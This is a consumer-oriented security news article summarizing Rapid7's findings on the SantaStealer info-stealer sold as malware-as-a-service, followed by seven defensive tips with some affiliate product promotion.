SantaStealer malware still active, targeting passwords and crypto

Don’t let the name fool you. SantaStealer didn’t pack up and leave after Christmas. It’s still circulating and, if anything, growing more popular. Scammers are always looking for fresh ways to make money in the new year.

One reason it’s spreading so easily is its low barrier to entry. SantaStealer is sold as malware-as-a-service. That means almost anyone can pay a small fee and start targeting people at scale.

Criminals are actively promoting the malware on Telegram and underground hacker forums. Sellers advertise it as a quiet, memory-only info stealer. They claim it can run in the background and grab sensitive data without dropping obvious files onto a computer.

That “memory-only” label sounds scarier than it really is. It doesn’t make the malware invisible. Instead, it leaves fewer traces on the hard drive, which can slow detection. Even so, the promise is appealing to criminals. Saved passwords, active login sessions, and crypto wallets remain some of the easiest and most valuable targets to steal.

SantaStealer and how it actually works

SantaStealer operates as a malware-as-a-service, charging $175 per month for its basic tier and $300 per month for the premium plan. Researchers at Rapid7 say the operation rebrands an earlier project called BluelineStealer, with a Russian-speaking developer pushing toward a wider launch before the end of the year.

Despite bold claims about evading detection, Rapid7’s analysis paints a more grounded picture. The samples they examined were not particularly difficult to analyze and lacked the advanced anti-analysis techniques being advertised, which is good news for us. If it can be detected, security tools have a better chance of removing it before it can do serious damage.

Functionally, SantaStealer is still dangerous. It uses 14 separate data-collection modules that run in parallel, pulling information from browsers, messaging apps like Telegram and Discord, gaming platforms such as Steam, crypto wallet apps and extensions, and even local documents. The malware can also take screenshots of your desktop. Stolen data is written to memory, compressed into ZIP files, and sent out in 10MB chunks to a hardcoded command-and-control server.

One notable capability is its use of an embedded executable to get around Chrome’s App-Bound Encryption, a security feature introduced in mid-2024. This workaround typically requires the malware to be executed at the user level and is not a remote bypass of Chrome’s security model. Similar tricks have already been used by other info-stealers, showing how quickly attackers test and adapt to new browser protections.

Rapid7

What this says about the current threat landscape

SantaStealer is not fully operational yet and has not been distributed at scale, but it reflects a broader trend in cybercrime. Modern info-stealers are modular, configurable, and sold much like regular software. The affiliate panel that Rapid7 observed allows buyers to fine-tune exactly what data the malware steals, from full system sweeps to narrowly targeted attacks focused on specific apps or crypto wallets.

The malware also includes options to avoid infecting systems in certain regions and to delay execution, which can throw off both victims and security analysts. As for how SantaStealer might spread, researchers say recent campaigns increasingly rely on ClickFix-style attacks. These tricks push victims into pasting malicious commands directly into the Windows terminal, often disguised as steps to fix an issue or enable a feature.

More traditional methods are still very much in play. Phishing emails, pirated software, torrent downloads, malicious ads, and even deceptive YouTube comments remain effective delivery channels. Once malware like this runs on a system, it needs very little time to grab saved passwords, session cookies, and wallet data that can later be abused or sold.

7 steps you can take to stay safe from SantaStealer malware

A few sensible habits and the right tools can significantly reduce your risk, even if malware like this continues to evolve. Here are seven practical steps you can take to stay safe:

1) Use strong antivirus software

Modern antivirus tools don’t just look for known malware signatures. They also monitor suspicious behavior, such as programs trying to grab browser data or run hidden processes. Keep real-time protection enabled and take alerts seriously instead of dismissing them.

The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

2) Keep your operating system and apps updated

Updates are not just about new features. They often patch security flaws that malware actively targets. This includes your OS, browser, browser extensions, crypto wallet apps, and messaging tools. Delaying updates gives attackers a wider window to exploit known weaknesses.

3) Switch to a password manager

Info-stealers love browser-saved passwords because they are easy to grab. A password manager stores your credentials in an encrypted vault and reduces what your browser keeps locally. It also helps you use strong, unique passwords for every service without having to remember them.

Next, see if your email has been exposed in past breaches. Our #1 pick, NordPass, includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

4) Turn on two-factor authentication wherever possible

Even if your password is stolen, 2FA can stop attackers from getting in. App-based authenticators are more secure than SMS codes and should be your first choice for email, crypto exchanges, cloud services, and social media accounts.

5) Be extremely careful with commands and “quick fixes”

ClickFix-style attacks rely on trust and urgency. If a website, pop-up, or video tells you to paste a command into the Windows terminal to fix something, stop. Unless you fully understand what that command does, assume it is dangerous.

6) Use a personal data removal service

When your email, phone number, or other personal details are widely available online, attackers can target you more convincingly. Personal data removal services help take your information down from data broker sites, reducing the chances of targeted phishing or malware lures.

While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

Is your personal information exposed online?

Run a free scan to see if your personal info is compromised. Results arrive by email in about an hour.

7) Avoid pirated software and unverified extensions

Cracked software, torrents, and shady browser extensions remain some of the most reliable malware delivery methods. They often bundle info-stealers that run quietly in the background. Stick to official app stores, trusted developers, and verified extensions, even if it means skipping a “free” download.

Related Links: 

• Louvre heist exposes weak password problem
• 183 million email passwords leaked: Check yours now
• Best Password Managers expert reviewed 2025

Kurt’s key takeaway

SantaStealer may not yet live up to its own hype, but that should not make you complacent. Early-stage malware often improves quickly once developers patch obvious mistakes. Be cautious with links and attachments from unfamiliar emails, and think twice before running unverified code or browser extensions pulled from public repositories.

When was the last time you checked which extensions have access to your data? Let us know in the comments below.

FOR MORE OF MY TECH TIPS & SECURITY ALERTS, SUBSCRIBE TO MY FREE CYBERGUY REPORT NEWSLETTER HERE

Copyright 2025 CyberGuy.com. All rights reserved. CyberGuy.com articles and content may contain affiliate links that earn a commission when purchases are made.